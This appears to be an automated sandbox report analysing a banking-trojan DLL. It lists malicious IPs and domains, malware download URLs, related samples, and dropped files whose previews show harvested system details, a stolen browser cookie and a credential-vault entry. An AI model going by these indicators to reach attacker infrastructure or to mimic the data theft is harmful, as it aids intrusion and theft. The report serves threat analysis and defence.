                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://help.disneyplus.com.RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        193.56.146.127
                                                        		unknownunknown
                                                        		10753LVLT-10753UStrue
                                                        116.121.62.237
                                                        		cabrioxmdes.atKorea Republic of
                                                        		9578CJNET-ASCheiljedangCoIncKRtrue
                                                        185.189.151.28
                                                        		unknownSwitzerland
                                                        		51395AS-SOFTPLUSCHtrue

                                                        Private

                                                        IP
                                                        192.168.2.1

                                                        General Information

                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:620323
                                                        Start date and time: 04/05/202216:17:342022-05-04 16:17:34 +02:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 12m 22s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:2oCOO5LbPu.dll
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:48
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:4
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HDC Information:
                                                        • Successful, ratio: 20.6% (good quality ratio 19.7%)
                                                        • Quality average: 82.2%
                                                        • Quality standard deviation: 27%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 161
                                                        • Number of non-executed functions: 210
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .dll
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Override analysis time to 240s for rundll32

                                                        Warnings

                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 13.107.43.16
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, time.windows.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
                                                        • Execution Graph export aborted for target mshta.exe, PID 6576 because there are no executed function
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: 2oCOO5LbPu.dll

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        16:19:30API Interceptor33x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        116.121.62.237sMkn7O6QSL.exeGet hashmaliciousBrowse
                                                        • fuyt.org/files/1/build3.exe
                                                        yc4156tWck.exeGet hashmaliciousBrowse
                                                        • fuyt.org/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                                                        zSUK57qqvS.exeGet hashmaliciousBrowse
                                                        • coralee.at/upload/
                                                        7WSej7fCUu.exeGet hashmaliciousBrowse
                                                        • fuyt.org/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                        Dk3DP1at3Z.exeGet hashmaliciousBrowse
                                                        • fuyt.org/test1/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C
                                                        jpnV6Axa8Q.exeGet hashmaliciousBrowse
                                                        • fuyt.org/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C
                                                        eTV0IkGBnz.exeGet hashmaliciousBrowse
                                                        • linislominyt11.at/
                                                        tlj7AJm3AK.exeGet hashmaliciousBrowse
                                                        • coralee.at/upload/
                                                        7dfd.exeGet hashmaliciousBrowse
                                                        • algrcabel.ru/upload/
                                                        Xy2V4EFSo7.exeGet hashmaliciousBrowse
                                                        • coralee.at/upload/
                                                        tz1gBLhzCj.exeGet hashmaliciousBrowse
                                                        • pjure.at/upload/
                                                        JICHPAw7wi.exeGet hashmaliciousBrowse
                                                        • dollybuster.at/upload/
                                                        Bdxi4IJGUJ.exeGet hashmaliciousBrowse
                                                        • dollybuster.at/upload/
                                                        N1hAmPNziA.exeGet hashmaliciousBrowse
                                                        • dollybuster.at/upload/
                                                        KC9YFSn61O.exeGet hashmaliciousBrowse
                                                        • fuyt.org/files/1/build3.exe
                                                        3k6d7mS5Yq.exeGet hashmaliciousBrowse
                                                        • abpa.at/upload/
                                                        bZqr9adPQd.exeGet hashmaliciousBrowse
                                                        • rate0000my7777poo.com/cookies
                                                        m3Kj74OHkx.exeGet hashmaliciousBrowse
                                                        • rate0000my7777poo.com/loaderRules
                                                        K17SGkGOJM.exeGet hashmaliciousBrowse
                                                        • nahbleiben.at/upload/
                                                        Heb8EbCSwP.exeGet hashmaliciousBrowse
                                                        • amogohuigotuli.at/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        myip.opendns.comEIo7Dh2fzn.dllGet hashmaliciousBrowse
                                                        • 102.129.143.30
                                                        d6YCUW421p.dllGet hashmaliciousBrowse
                                                        • 102.129.143.53
                                                        cmicPQEC.exeGet hashmaliciousBrowse
                                                        • 84.17.52.18
                                                        624c5d1e2a846.dllGet hashmaliciousBrowse
                                                        • 102.129.143.67
                                                        sawepnTfU6.exeGet hashmaliciousBrowse
                                                        • 102.129.143.61
                                                        status.dllGet hashmaliciousBrowse
                                                        • 102.129.143.42
                                                        lia.exeGet hashmaliciousBrowse
                                                        • 102.129.143.64
                                                        gozi.exeGet hashmaliciousBrowse
                                                        • 102.129.143.64
                                                        agent_installer (1).exeGet hashmaliciousBrowse
                                                        • 102.129.143.62
                                                        agent_installer (1).exeGet hashmaliciousBrowse
                                                        • 102.129.143.62
                                                        2GEg45PlG9.exeGet hashmaliciousBrowse
                                                        • 84.17.52.63
                                                        FpYf5EGDO9.exeGet hashmaliciousBrowse
                                                        • 84.17.52.63
                                                        anIV2qJeLD.exeGet hashmaliciousBrowse
                                                        • 84.17.52.63
                                                        gECym.dllGet hashmaliciousBrowse
                                                        • 102.129.143.33
                                                        data.dllGet hashmaliciousBrowse
                                                        • 102.129.143.57
                                                        test1.dllGet hashmaliciousBrowse
                                                        • 102.129.143.57
                                                        test1.dllGet hashmaliciousBrowse
                                                        • 185.32.222.18
                                                        97Ys56eAFo.dllGet hashmaliciousBrowse
                                                        • 84.17.52.9
                                                        new_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                                                        • 84.17.52.9
                                                        OcEyzBswGm.exeGet hashmaliciousBrowse
                                                        • 84.17.52.41
                                                        cabrioxmdes.atEIo7Dh2fzn.dllGet hashmaliciousBrowse
                                                        • 210.92.250.133
                                                        624c5d1e2a846.dllGet hashmaliciousBrowse
                                                        • 190.219.109.25
                                                        l-0007.l-dc-msedge.netrXN8OIpbzz.dllGet hashmaliciousBrowse
                                                        • 13.107.43.16
                                                        Invoice#396.htmlGet hashmaliciousBrowse
                                                        • 13.107.43.16
                                                        Urgentn#U00a1 objedn#U00a0vka.pdf.exeGet hashmaliciousBrowse
                                                        • 13.107.43.16
                                                        pDut.dllGet hashmaliciousBrowse
                                                        • 13.107.43.16
                                                        HxEWwh74qT.dllGet hashmaliciousBrowse
                                                        • 13.107.43.16
                                                        6253ed88d7cd5.dllGet hashmaliciousBrowse
                                                        • 13.107.43.16
                                                        624c84a8263d3.dllGet hashmaliciousBrowse
                                                        • 13.107.43.16

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        LVLT-10753USEAlEfM79TWGet hashmaliciousBrowse
                                                        • 94.154.174.151
                                                        VJAGa1CbxAGet hashmaliciousBrowse
                                                        • 168.215.26.46
                                                        nhz2J0ywiSGet hashmaliciousBrowse
                                                        • 200.1.79.144
                                                        4B3zH33K2MGet hashmaliciousBrowse
                                                        • 147.207.148.242
                                                        x86Get hashmaliciousBrowse
                                                        • 94.154.174.138
                                                        cJtqATXS0FGet hashmaliciousBrowse
                                                        • 170.41.159.0
                                                        a4KSkrzwqBGet hashmaliciousBrowse
                                                        • 148.57.74.34
                                                        7nSmJgc4Js.exeGet hashmaliciousBrowse
                                                        • 193.56.146.76
                                                        BXVjfEdYoOGet hashmaliciousBrowse
                                                        • 94.154.174.170
                                                        fFSykqb6nKGet hashmaliciousBrowse
                                                        • 94.154.174.120
                                                        Tsunami.arm7Get hashmaliciousBrowse
                                                        • 94.154.174.147
                                                        6DeCg8WTgEGet hashmaliciousBrowse
                                                        • 148.57.27.150
                                                        2Pnddx5rjXGet hashmaliciousBrowse
                                                        • 94.154.174.116
                                                        DJowS0XtNvGet hashmaliciousBrowse
                                                        • 208.51.98.63
                                                        i686-20220428-2146Get hashmaliciousBrowse
                                                        • 94.154.174.109
                                                        lOBVgjoW7KGet hashmaliciousBrowse
                                                        • 94.154.174.164
                                                        arm7-20220426-0843Get hashmaliciousBrowse
                                                        • 149.150.206.198
                                                        d6YCUW421p.dllGet hashmaliciousBrowse
                                                        • 193.56.146.148
                                                        o2AHUUgivhGet hashmaliciousBrowse
                                                        • 148.57.27.116
                                                        i586-20220420-0452Get hashmaliciousBrowse
                                                        • 147.207.196.184
                                                        CJNET-ASCheiljedangCoIncKRABRg8o1DEaGet hashmaliciousBrowse
                                                        • 116.121.31.133
                                                        b3astmode.x86Get hashmaliciousBrowse
                                                        • 154.10.23.45
                                                        sMkn7O6QSL.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        yc4156tWck.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        7C4A7EN74j.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        zSUK57qqvS.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        7WSej7fCUu.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        Dk3DP1at3Z.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        jpnV6Axa8Q.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        eTV0IkGBnz.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        tlj7AJm3AK.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        7dfd.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        HQ3kyqBrJ7.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        Xy2V4EFSo7.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        tz1gBLhzCj.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        JICHPAw7wi.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        Bdxi4IJGUJ.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        N1hAmPNziA.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237
                                                        x86Get hashmaliciousBrowse
                                                        • 210.122.109.197
                                                        XS8m26L2Vn.exeGet hashmaliciousBrowse
                                                        • 116.121.62.237

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):91
                                                        Entropy (8bit):3.964980110923723
                                                        Encrypted:false
                                                        SSDEEP:3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
                                                        MD5:99BDE3452748E34D6C50275110A6A8D4
                                                        SHA1:E79CB2A8DB7D8490523529D3861F95BA73A20C23
                                                        SHA-256:D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
                                                        SHA-512:19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
                                                        Malicious:false
                                                        Preview:Cookies are no longer stored in files. Please use Internet*Cookie* APIs to access cookies.

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):11606
                                                        Entropy (8bit):4.8910535897909355
                                                        Encrypted:false
                                                        SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                                        MD5:F84F6C99316F038F964F3A6DB900038F
                                                        SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                                        SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                                        SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                                        Malicious:false
                                                        Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1192
                                                        Entropy (8bit):5.325275554903011
                                                        Encrypted:false
                                                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                        MD5:05CF074042A017A42C1877FC5DB819AB
                                                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                        Malicious:false
                                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                        C:\Users\user\AppData\Local\Temp\1E0C.bi1

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):120
                                                        Entropy (8bit):4.524106603776786
                                                        Encrypted:false
                                                        SSDEEP:3:cPaRhARtt7TSjjhThARtuV/gR01I1/v:oMWbtChWb0gR1/v
                                                        MD5:DF83C2808C7F54E162CE6A66507FBBBE
                                                        SHA1:B8E6CA152AFA7142F928BEF5849C4C54708138C8
                                                        SHA-256:23EB89272AD3DA25605683EA7B3691FA5F76508B19870F023AD55E9FAEE8D1B8
                                                        SHA-512:078BCF94F0EC71037319D9E90A0F60BE335BECFBBC6C60CB05FA5CBF3C3187245E7C9270E8A7F8C90DB8D2391D20DD6A7726EA60B8921ADC1B67144CC19CD233
                                                        Malicious:false
                                                        Preview:Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 102.129.143.40....-------- ..

                                                        C:\Users\user\AppData\Local\Temp\2E09.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):51527
                                                        Entropy (8bit):4.037117443902078
                                                        Encrypted:false
                                                        SSDEEP:1536:WMo5mDUI+p0C7fZtPWS2/4CXW+kmwjlC4xuLGdv/ltLDH6i2GawcWGuwZtuKbuYF:WMgB9QD
                                                        MD5:C7A2F628DCF3F85CE0F22072367AB241
                                                        SHA1:B271D32EA3E80C7032905E77C8CFB204D4586646
                                                        SHA-256:617784E5DC452EF14C733D51EF3C1C78FF227BDE7FBC0EF185518405D0A74744
                                                        SHA-512:73D9D8445C72B49F7AFD38E5E3F58A26A3FFBA258F8B27A8387729978E0446F92F1FADC10409E3248714B97B8904F1C7D509C06E223897A4AE709CD3286ED772
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:

                                                        C:\Users\user\AppData\Local\Temp\2E09.bin1

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2192
                                                        Entropy (8bit):4.508807162396169
                                                        Encrypted:false
                                                        SSDEEP:48:LjmD3CNY2+3JxGK/JIjW37Xi7ZkgTMyErcCGuJUbCFRZC:LjmDyu2uHEN2ad+USy
                                                        MD5:283BF832B79AAEB537B565120932F2A5
                                                        SHA1:B54B0319174E531BB29691F54DEB21A27923EBFF
                                                        SHA-256:FD249DEFC2ED59284514EB5E6422E241B23C964C1C0F5B20A1082A866939CD5B
                                                        SHA-512:9C73F3DECB76FEEBE10CF72A744FFD5F115BF30FEA811056927A6DCB7D6412A31ED22764814F9B1F79B7FAA9127B00B421F89E345EF11E4483C3E2875E9ED3D6
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:

                                                        C:\Users\user\AppData\Local\Temp\84C2.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):228
                                                        Entropy (8bit):5.658648125232449
                                                        Encrypted:false
                                                        SSDEEP:3:vhjnl/lk/Pty7doMLz+iFmoATVffEjxdHIcX6HXIlfzUU2v9qInll1/lk/Pty/lb:5jttz+mmRVXYxdocX2Il6nlzkOVl+lIn
                                                        MD5:FDFBDE5D49536CED9C27DB86286777E2
                                                        SHA1:0D2786D903F7F23EA42737469CCE0B692FEFE216
                                                        SHA-256:28D47152041EFA538E81BD143B621254D43ABAE88B5B0B3E917B266698633AB1
                                                        SHA-512:028650BB005585508CAD066C56C1B298984F9820F7E8689AD9F715C790C34EA40C48225C1D478B2A1942C1266420FBC11CACE4C1C9991B0AFE5142A376EB0325
                                                        Malicious:false
                                                        Preview:PK............@...t...........D8E.bin..1..@...@...,$e`..).....v.r.=vWC~.....f.....Y..3Cu.G.Lcd..qY ......b2.#.Y..;.......k..}c.XO.I..}v.9?.Hh..%.^.PK..............@...t.........................D8E.binPK..........5.........

                                                        C:\Users\user\AppData\Local\Temp\90BF.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):412
                                                        Entropy (8bit):6.836864258334393
                                                        Encrypted:false
                                                        SSDEEP:12:5jxf4sSBMtothqUWWWUXbeuj29Trx/f5Yajtn:9xf4sSBCqAWWnTpfJtn
                                                        MD5:49B7CE4DF08EEAA8EF83CBD75C92B206
                                                        SHA1:B821F695DA61B19831C426030128FE752FBEB158
                                                        SHA-256:DB4726A19EB763CD9C9C93A28E3A9F621DBFA19813B4A5141D54952DB3A7C659
                                                        SHA-512:5A6BC3BE9652FAC414C510E285318AD513969DD470588569A84A1A12E247E02BC28A8441AD49DB9B535EE76BA86ABE07E85E5863F103858F215EB8EA1E3AC1A5
                                                        Malicious:false
                                                        Preview:PK............X4..,...z.......C9B.bin=.]o.0...K.....Iv..:D.3..T.J[.Vq......O....h.\... \.......`.r....EE.G.4&]M.,..!....m .6...J..%...}.UK4.....Q:s...(.M5...Ozl5..G..1...UC....>._.J.H.....J=\.>....36....,*;kU.~FKo.B|/ph.3..h.c..A......*4...9T.._\ys..4_...3._$=!..{.../w.IbB..o.=R...dY..7kN.?q.(Mn|.jE....;.c.o}zQ.e.._.PK..............X4..,...z.....................C9B.binPK..........5...Q.....

                                                        C:\Users\user\AppData\Local\Temp\A717.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:modified
                                                        Size (bytes):9373
                                                        Entropy (8bit):7.969688687051471
                                                        Encrypted:false
                                                        SSDEEP:192:zOYOv4MyLGQcHMHrVF6xsxIAQib5UwMA2Gp5XJe5r:Uv4rUHgrj6sSAlLRrXJex
                                                        MD5:DC2925093A6793DB90E71F34D0DA9D51
                                                        SHA1:B50166DDC6DDCAFF7644C37EEF03DC71B3BB22A7
                                                        SHA-256:514D4B65B3BCB2059C0D908963FB7CF8A9BE3C9BA0D575462186E01B51DE03F8
                                                        SHA-512:161691FCEDCAEAF6A3E834F78645E3E09A7D1DB69FC78FB49DB2DB38999A5554BB12EC664CC0F65C8A5B2A3BE8879502DA6C4229681BB616C4E3A8CEE81D7ADA
                                                        Malicious:false
                                                        Preview:PK..............}-$..G.......E09.bin.}{s.....|....l......%J.6..#.v.R..I..u...;5....)K2.0g.9.....D..h4.......e.....a..O./....z.~_z...<. .];..p...n..O. .........7.^...3.L.K.*\.k.(s=G 4i6..lm.i.....w..8.c+.p.b..kw..wjM.......$..c.VM.._..n.3/u.8.Q...0..z.n.6n...9..S..*./E..L.....%7..D..N...J...(".Z..: mQ.h..d.L....,O......:|.m.;...(.?..:..%.....0...0L....0.\.F.,..._.......!........f.w/.e....A.^7..n|/?..|.`..vVV..2.D$T....{OJB....9{.N8..?.../...y=U.Z...=.0.2.(r....>. s.D....,...|..fG.vx....W..|......s.P{.....K.n|..Z...S.....".'x.u.s.Wb|.o?\Z....].e>....m..k..N...$.xn..>..n.....t...w. ....j..L.7.`......o.t!.....S..O..........G..........(.,..a..c.....0G~)5....l.....\.Zy....'I.....8.j..g.t..9.~....J....^wp.Y .&....rdX.$L]..K...R.a.#.t....@............d....p.....]..b-xxe./.t.>..N..3...5J....cP...$.z6....a.Q...z%|v7..e...0.@....zU...$...Tdh._..a...sH..C.V3C..'.C.(..h...|&..g...F.6k4./..v_..(..b-v..=.)0l`*...@...<.(H.|l..`.`..B..0yNQ...<.F.s].W.B

                                                        C:\Users\user\AppData\Local\Temp\CC9B.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):378
                                                        Entropy (8bit):5.599881960561245
                                                        Encrypted:false
                                                        SSDEEP:6:YM6jkk4RTML/pU98M7ETSHp926Sfp2LiGhFEbhTqKxUNHdHZ2HmwhZZZHwFnAVN:YJkk4RoL/p4vE6UxfELiKwsb9HZ2pHRL
                                                        MD5:4CFD7AAC201D285D1EB218F0043BB0E8
                                                        SHA1:37A3071C28DCB2D07F0FFFB4AB00863A3A396C03
                                                        SHA-256:ED0EFDBE241441D7C0A2C23B612916F757E935F5970EC2BAE86744F659D01E75
                                                        SHA-512:80FAF7B9B4E3A749F186F4E9E5E0F230EE20ED95CAA028621B262D86F69470BCC66BC19E5FD81E5C70DF7042C1F6C7FE81EBE4521F24E018F74B859CD02C79CC
                                                        Malicious:false
                                                        Preview:{"id":0,"agent":"CR","domain":".google.com","expirationDate":1617262195,"hostOnly":false,"httpOnly":true,"name":"NID","path":"/","sameSite":"false","secure":true,"session":false,"storeId":"0","value":"204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78"}

                                                        C:\Users\user\AppData\Local\Temp\ED8E.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):176
                                                        Entropy (8bit):4.832266387295497
                                                        Encrypted:false
                                                        SSDEEP:3:1D3YJkcidTWXH+CDcNY7gwWASAcX4CDcNY7gwWARKaJFvVoXxOkcidcWSKXBFvn:uJkcilWXeCQNY7gZASAbCQNY7gZAdJFm
                                                        MD5:7F4BAB53E86D1F77B9A69B4BEC3ED22A
                                                        SHA1:66D613BD2DCD6743C4185C09BFD1CA40B0964C88
                                                        SHA-256:F5CE776775D9EBFBEA69837550D59204A8521B9553EB243656A7B12FF5D57D11
                                                        SHA-512:0139A01E0170D7CFBE3BDA0D8307D49DAB442976A5E61F02993B139BF53C23639F162FF8B5842792FE76812CD798B649F567BECDA88699523688A4C3A34C39A3
                                                        Malicious:false
                                                        Preview:type=ED, name=02mhakedhkeskfde, address=MicrosoftAccount:target=SSO_POP_Device, server=MicrosoftAccount:target=SSO_POP_Device, port=0, ssl=0, user=02mhakedhkeskfde, password=..

                                                        C:\Users\user\AppData\Local\Temp\RES3A11.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.9888712937502846
                                                        Encrypted:false
                                                        SSDEEP:24:H1e9E2+fPtDfHFuQhKdNWI+ycuZhNH3akSUgPNnq9qd:XJlzKd41ulH3a3U4q9K
                                                        MD5:891E8CF61EBFAA4D51E0B4A09BFC9262
